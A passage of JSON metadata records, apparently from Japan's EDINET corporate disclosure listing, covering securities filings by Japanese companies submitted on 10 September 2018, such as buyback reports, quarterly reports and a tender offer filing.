"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 147,
"docID": "S100E2PB",
"edinetCode": "E05346",
"secCode": "84390",
"JCN": "6010401015821",
"filerName": "東京センチュリー株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "113001",
"docTypeCode": "090",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:56",
"docDescription": "訂正発行登録書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100C96Z",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 148,
"docID": "S100E1Y6",
"edinetCode": "E02962",
"secCode": "27840",
"JCN": "3010001084757",
"filerName": "アルフレッサホールディングス株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:58",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 149,
"docID": "S100E1N7",
"edinetCode": "E03116",
"secCode": "82140",
"JCN": "5020001091635",
"filerName": "株式会社AOKIホールディングス",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:00",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 150,
"docID": "S100E2YA",
"edinetCode": "E02541",
"secCode": "80380",
"JCN": "9010001034847",
"filerName": "東都水産株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:07",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 151,
"docID": "S100E2LQ",
"edinetCode": "E01503",
"secCode": "61420",
"JCN": "5180301019188",
"filerName": "富士精工株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:10",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 152,
"docID": "S100E2ZH",
"edinetCode": "E02742",
"secCode": "98240",
"JCN": "2120001066027",
"filerName": "泉州電業株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 10:10",
"docDescription": "四半期報告書-第69期第3四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 153,
"docID": "S100E2ZK",
"edinetCode": "E02742",
"secCode": "98240",
"JCN": "2120001066027",
"filerName": "泉州電業株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:13",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 154,
"docID": "S100E27Q",
"edinetCode": "E02204",
"secCode": "72790",
"JCN": "1140001081875",
"filerName": "株式会社ハイレックスコーポレーション",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 10:15",
"docDescription": "四半期報告書-第75期第3四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 155,
"docID": "S100E27O",
"edinetCode": "E02204",
"secCode": "72790",
"JCN": "1140001081875",
"filerName": "株式会社ハイレックスコーポレーション",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:17",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 156,
"docID": "S100E2ZC",
"edinetCode": "E00436",
"secCode": "28020",
"JCN": "8010001034740",
"filerName": "味の素株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:19",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 157,
"docID": "S100E2Z9",
"edinetCode": "E33637",
"secCode": null,
"JCN": "6010001187433",
"filerName": "日本郵政キャピタル株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:21",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E31681",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E2KZ",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 158,
"docID": "S100DYZS",
"edinetCode": "E03628",
"secCode": null,
"JCN": "9010001034962",
"filerName": "みずほ信託銀行株式会社",
"fundCode": "G07757",
"ordinanceCode": "030",
"formCode": "09A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 10:21",
"docDescription": "有価証券報告書(内国信託受益証券等)-第17期(平成29年12月12日-平成30年6月11日)【みなし訂正有価証券届出書】",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CGGN",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 159,
"docID": "S100E2VH",
"edinetCode": "E04804",
"secCode": "97440",
"JCN": "1180001027412",
"filerName": "株式会社メイテック",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:30",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 160,
"docID": "S100E2FP",
"edinetCode": "E04817",
"secCode": "97570",
"JCN": "1120001069955",
"filerName": "株式会社船井総研ホールディングス",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:33",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 161,
"docID": "S100E2VV",
"edinetCode": "E22083",
"secCode": null,
"JCN": "6010001083062",
"filerName": "三井物産企業投資株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:42",
"docDescription": "変更報告書",
"issuerEdinetCode": "E05328",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 162,
"docID": "S100E2ZY",
"edinetCode": "E05680",
"secCode": "38430",
"JCN": "8011001034292",
"filerName": "フリービット株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 10:42",
"docDescription": "四半期報告書-第19期第1四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 163,
"docID": "S100E2NM",
"edinetCode": "E33416",
"secCode": "92670",
"JCN": "5210001016969",
"filerName": "Genky DrugStores株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "030000",
"docTypeCode": "120",
"periodStart": "2017-12-21",
"periodEnd": "2018-06-20",
"submitDateTime": "2018-09-10 10:42",
"docDescription": "有価証券報告書-第1期(平成29年12月21日-平成30年6月20日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 164,
"docID": "S100E301",
"edinetCode": "E05680",
"secCode": "38430",
"JCN": "8011001034292",
"filerName": "フリービット株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:44",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 165,
"docID": "S100E2TM",
"edinetCode": "E33416",
"secCode": "92670",
"JCN": "5210001016969",
"filerName": "Genky DrugStores株式会社",
"fundCode": null,
"ordinanceCode": "015",
"formCode": "010000",
"docTypeCode": "235",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:47",
"docDescription": "内部統制報告書-第1期(平成29年12月21日-平成30年6月20日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 166,
"docID": "S100E2TD",
"edinetCode": "E33416",
"secCode": "92670",
"JCN": "5210001016969",
"filerName": "Genky DrugStores株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:48",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 167,
"docID": "S100E303",
"edinetCode": "E34326",
"secCode": null,
"JCN": "3010001193533",
"filerName": "XTech HP株式会社",
"fundCode": null,
"ordinanceCode": "040",
"formCode": "020000",
"docTypeCode": "240",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:50",
"docDescription": "公開買付届出書",
"issuerEdinetCode": null,
"subjectEdinetCode": "E05431",
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 168,
"docID": "S100E2VG",
"edinetCode": "E02439",
"secCode": "78780",
"JCN": "8090001004562",
"filerName": "株式会社光・彩",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 11:13",
"docDescription": "四半期報告書-第52期第2四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 169,
"docID": "S100E267",
"edinetCode": "E02439",
"secCode": "78780",
"JCN": "8090001004562",
"filerName": "株式会社光・彩",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:13",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 170,
"docID": "S100E2ZQ",
"edinetCode": "E22350",
"secCode": null,
"JCN": "8240001000414",
"filerName": "株式会社足利興産",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:14",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E00480",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100DVEA",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 171,
"docID": "S100E30H",
"edinetCode": "E05431",
"secCode": null,
"JCN": "7010401089880",
"filerName": "エキサイト株式会社",
"fundCode": null,
"ordinanceCode": "040",
"formCode": "040000",
"docTypeCode": "290",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:24",
"docDescription": "意見表明報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": "E34326",
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E303",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 172,
"docID": "S100E312",
"edinetCode": "E02688",
"secCode": "80860",
"JCN": "8120001068678",
"filerName": "ニプロ株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:34",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 173,
"docID": "S100E31A",
"edinetCode": "E05209",
"secCode": "42950",
"JCN": "3130001022300",
"filerName": "株式会社フェイス",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:46",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 174,
"docID": "S100E319",
"edinetCode": "E26579",
"secCode": "31740",
"JCN": "4040001063955",
"filerName": "株式会社ハピネス・アンド・ディ",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:47",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 175,
"docID": "S100E31H",
"edinetCode": "E05704",
"secCode": "21590",
"JCN": "4011001041672",
"filerName": "株式会社フルスピード",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 11:53",
"docDescription": "四半期報告書-第19期第1四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 176,
"docID": "S100E31I",
"edinetCode": "E05704",
"secCode": "21590",
"JCN": "4011001041672",
"filerName": "株式会社フルスピード",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:54",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 177,
"docID": "S100E30X",
"edinetCode": "E23250",
"secCode": "87140",
"JCN": "1120001140303",
"filerName": "株式会社池田泉州ホールディングス",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 12:25",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 178,
"docID": "S100E2SF",
"edinetCode": "E00208",
"secCode": "97430",
"JCN": "3010501007440",
"filerName": "株式会社丹青社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 13:19",
"docDescription": "四半期報告書-第61期第2四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 179,
"docID": "S100E2UQ",
"edinetCode": "E02055",
"secCode": "67970",
"JCN": "7180001020428",
"filerName": "名古屋電機工業株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:20",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 180,
"docID": "S100E2SM",
"edinetCode": "E00208",
"secCode": "97430",
"JCN": "3010501007440",
"filerName": "株式会社丹青社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:22",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 181,
"docID": "S100E1C2",
"edinetCode": "E05304",
"secCode": "23270",
"JCN": "9010001045803",
"filerName": "日鉄ソリューションズ株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:24",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 182,
"docID": "S100E2UY",
"edinetCode": "E04367",
"secCode": null,
"JCN": "9040001044645",
"filerName": "成田国際空港株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "110000",
"docTypeCode": "080",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:25",
"docDescription": "発行登録書(株券、社債券等)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 183,
"docID": "S100E32Z",
"edinetCode": "E01190",
"secCode": "52140",
"JCN": "4160001001498",
"filerName": "日本電気硝子株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:27",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 184,
"docID": "S100E1BG",
"edinetCode": "E05861",
"secCode": null,
"JCN": null,
"filerName": "ビー・エヌ・ピー・パリバ",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "150003",
"docTypeCode": "100",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:28",
"docDescription": "発行登録追補書類",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CHJC",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 185,
"docID": "S100E2VC",
"edinetCode": "E00717",
"secCode": "94740",
"JCN": "5290801002046",
"filerName": "株式会社ゼンリン",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:30",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 186,
"docID": "S100E2TY",
"edinetCode": "E05355",
"secCode": null,
"JCN": "8010401005011",
"filerName": "NTTファイナンス株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "110000",
"docTypeCode": "080",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:31",
"docDescription": "発行登録書(株券、社債券等)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 187,
"docID": "S100E33F",
"edinetCode": "E01137",
"secCode": "53330",
"JCN": "3180001010829",
